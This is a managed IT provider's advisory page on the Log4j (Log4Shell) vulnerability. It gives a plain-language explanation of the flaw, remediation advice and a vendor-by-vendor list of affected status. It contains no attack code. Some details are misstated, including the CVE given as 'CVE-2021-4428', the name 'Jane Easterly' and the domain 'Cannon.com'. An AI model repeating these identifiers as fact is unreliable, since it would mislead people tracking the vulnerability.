Log4j Vulnerability Update

log4j Zeroday Vulnerability
Network Center, Inc.

NCI Core Services Being Monitored:

* Green = Not Affected, Black = Affected
* View the full list or jump to vendor info by clicking below 

3CX | Amazon | Arctic Wolf | Canon | Cisco | AvePoint |Bomgar/BeyondTrust | Citrix | ConnectWise | Datto | Dell | ESET | Fortinet | Graylog | Github | Gitlab | HPE | IGEL | IT Glue/ Kaseya | IX Systems | Jamf | LionGuard | Manage Engine | Netapp | Nutanix | Palo Alto | Pure Storage | Solarwinds | Sonicwall | Tintri | Ubiquiti | Veeam | VMware | WatchGuard | Zerto  

What is logj4? 

The log4j security vulnerability is one of the most widespread cybersecurity threats in recent years. It affects enterprise software, custom applications, and forms part of many cloud computing services. In short, it's a really big deal. 

Log4j is a java based library that's used by thousands of websites and applications to perform functions most don't even realize is happening, such as logging information for developers, debugging, and various other purposes. All web applications need this kind of functionality, which means the use of log4j is everywhere. Log4j has been downloaded millions of times and is one of the most widely used tools to collect information across corporate computer networks. 

Jane Easterly, CISA Agency Director
“[This vulnerability] is one of the most serious I’ve seen in my entire career, if not the most serious. We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage.” 

How does the vulnerability work?

Log4j contains a security hole where data containing a specific sequence of characters sent to it through that website results in log4j fetching additional software from an external website and can run it. The vulnerability has been named Log4Shell. If exploited, an attacker can make the server that is running log4j run any software they want, including software that can take over that server (known as a Remote Code Execution attack). In short, cybercriminals have the ability to take over thousands of websites and online applications. 

What and Who's at Risk? 

In short, any device that's connected to the internet, both IT and Operational Technology (OT), is at risk of running Apache log4j. Original reports showed that there were only a few hundred detection attempts at exploiting Log4j... that is no longer the case. New data now reveals thousands of attempts every single second! Addressing this vulnerability will be a challenge for most organizations and will take months, if not years to secure all of the devices likely affected. 

What Action Should you Take? 

Log4j is deeply embedded, making it difficult to know if the application is even running within the systems. Cybersecurity experts are urging organizations to take action. 

Businesses should ensure their IT provider or system administrators are enacting a process that involves:

  1. Research for notifications from software vendors on their websites
  2. Locating all the vulnerable applications via an automated script or scan
  3. Scheduling a maintenance period to patch or mitigate the vulnerability

A good first step is conducting a Log4j vulnerability scan for both external and internal networks.  The reports from the scans will provide a list of affected applications and help create a remediation roadmap if necessary.

RESOURCES: 

If your organization needs assistance, our team at NCI has created log4j specific vulnerability scans and can help with remediation needs uncovered from the scan reports. 

Given the complexity of this situation, we recommend reviewing this comprehensive list from the Cybersecurity and Infrastructure Security Agency to see the real-time information regarding software vulnerabilities from vendors. 

NCI Core Services Updates:

Updated 2/03/2022
* Green = Not Affected, Black = Affected

  • 3CX - Not Affected
  • Amazon - All products have been remediated 
  • Arctic Wolf - Not Affected 
  • AvePoint - Not Affected 
  • Bomgar / BeyondTrust -  Not Affected 
  • Canon -  Not Affected. More information found here - Cannon.com/support
  • Cisco -  Cisco has found several affected products and is investigating to determine which products may be affected by these vulnerabilities. The following link will be updated with information about affected products and available patches:
  • Citrix - 2 Products Affected. For further details and patching information, visit Citrix Security Advisory resource page 
    • Endpoint Management (XenMobile Server) 
    • Citrix Virtual Apps and Desktops (XenApp & XenDesktop), Linux VDA (non-LTSR versions only)
  • ConnectWise – Not Affected
  • Datto – Not Affected
  • Dell – The following links provides details of Dell products that have been confirmed as impacted by Log4j vulnerability. For additional details, visit Dell Response to Apache Log4j Remote Execution Vulnerability
  • ESET – Not Affected
  • Fortinet – Certain Fortinet products have been confirmed as affected by the Log4j vulnerabilities. For a full list of affected and nonaffected products along with available fixes, follow this link 
  • Graylog – All versions have been fixed. Follow this link for more information on versions and recommendations. 
  • Github – Mitigation instructions posted December 14th. Click here for more information from GitHub
  • Hewlett Packard Enterprise – Several products have been confirmed affected. Click here for a comprehensive list of known product vulnerabilities. More information available here- Hewlett Packard Enterprise Product Security Vulnerability Alerts 
  • IGEL – IGEL Universal Management Suite (UMS), all versions since 5.09.100, confirmed affected by the vulnerabilities. The recommended course of action is to update to the fixed version. For more information, visit ISN 2021-11:UMS Log4j Vulnerability
  • IT Glue / Kaseya – Not affected 
  • IX Systems – Not affected 
  • Jamf – Mitigated and patched. Additional Details can be found here -community.jamf.com
  • LionGuard - Investigating. No direct risks identified. For more information visit liongard.com/faq-apache-log4j-vulnerability
  • Manage Engine – ADManager Plus has identified mitigation steps, click here for more information
  • Netapp – Several products are affected by the vulnerabilities. For a full list and remediation recommendations, follow this link: security.netapp.com/advisory
  • Nutanix – Currently no products affected 
  • Palo Alto – Not affected 
  • Pure Storage – Still under investigation. Known risks to several products associated with Log4shell CVE-2021-4428. Additional details and mitigation steps available
  • SolarWInds – Server & Application Monitor (SAM) affected, Database Performance Analyzer (DPA) affected. More details and recommendations can be found here - support.solarwinds.com
  • Sonicwall – Email Security is affected. NSM and analytics are still being investigated. For more information - sonicwall.com/vuln-detail
  • Tintri – Not affected 
  • Ubiquiti – Affected. Follow guidance in the following link: community.ui.com/releases/UniFi-Network-Application
  • Veeam – Not affected 
  • VMware – Products known to be affected as well as patching information and workarounds are listed in the VMware advisory
  • WatchGuard – Not Affected 
  • Zerto Not Affected 

 

Video Resources: 

Live Q&A